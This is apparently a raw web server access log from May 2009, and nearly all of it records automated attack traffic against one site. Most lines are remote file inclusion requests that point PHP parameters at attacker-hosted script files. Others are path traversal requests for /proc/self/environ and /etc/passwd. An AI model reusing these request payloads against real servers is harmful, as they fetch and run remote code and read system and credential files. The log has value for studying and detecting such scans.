61.81.93.2 - - [20/May/2009:09:05:41 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:41 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:41 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:41 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:42 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:42 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:42 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:44 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:44 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:44 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:44 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:45 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:47 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:48 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:05:51 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:51 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:05:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:05:51 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:05:52 -0700] "GET /logs/access_080426.log%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:53 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:53 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:53 -0700] "GET /logs/access_080612.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
88.2.7.227 - - [20/May/2009:09:05:54 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:54 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:55 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:55 -0700] "GET /logs/access_080612.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:56 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:56 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:05:56 -0700] "GET /logs/access_080612.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
88.2.7.227 - - [20/May/2009:09:05:57 -0700] "GET /logs/access_080612.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:05:57 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.2.7.227 - - [20/May/2009:09:05:57 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:05:57 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:05:57 -0700] "GET /logs/access_081212.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:06:00 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:04 -0700] "GET /logs/access_081030.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:06 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:06:15 -0700] "GET /logs/access_081201.log%20%20/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:06:15 -0700] "GET /logs/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 100346 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:06:16 -0700] "GET ////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 42062 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:06:24 -0700] "GET /logs/access_090215.log%20%20/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:25 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:25 -0700] "GET /logs//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:25 -0700] "GET /guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:30 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:30 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:30 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:30 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:32 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:32 -0700] "GET /logs//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:32 -0700] "GET /guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:06:35 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:06:40 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:06:43 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:06:44 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:06:44 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:06:49 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:06:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:06:59 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:07:00 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:07:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:07:07 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:07:09 -0700] "GET /logs/access_081212.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:07:09 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:07:14 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:07:19 -0700] "GET /logs/access_081030.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:07:21 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:07:22 -0700] "GET /logs/access_081101.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.97.13.199 - - [20/May/2009:09:07:23 -0700] "GET /logs/access_081101.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.2.7.227 - - [20/May/2009:09:07:23 -0700] "GET /logs/access_081101.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
88.2.7.227 - - [20/May/2009:09:07:24 -0700] "GET /logs/access_081101.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:07:31 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:07:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:07:32 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:07:32 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:07:32 -0700] "GET /config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:07:32 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:07:32 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:07:33 -0700] "GET /skin/zero_vote/ask_password.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:07:33 -0700] "GET /logs/access_080330.log%20//skin/zero_vote/ask_password.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:07:37 -0700] "GET /logs/access_090311.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:07:37 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:07:37 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:07:38 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:42 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:42 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:42 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:43 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:47 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:47 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:47 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:47 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:47 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:48 -0700] "GET /logs/access_081118.log%20%20//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:49 -0700] "GET /logs/access_081118.log%20%20//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:49 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:49 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:07:49 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:51 -0700] "GET /logs/access_080421.log%20%20//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:07:53 -0700] "GET /logs/access_080421.log%20%20//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:00 -0700] "GET /config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:00 -0700] "GET /logs/access_080823.log%20%20//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:08:05 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:08:06 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:08:07 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:10 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:08:10 -0700] "GET /logs/access_080118.log%20%20//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:10 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
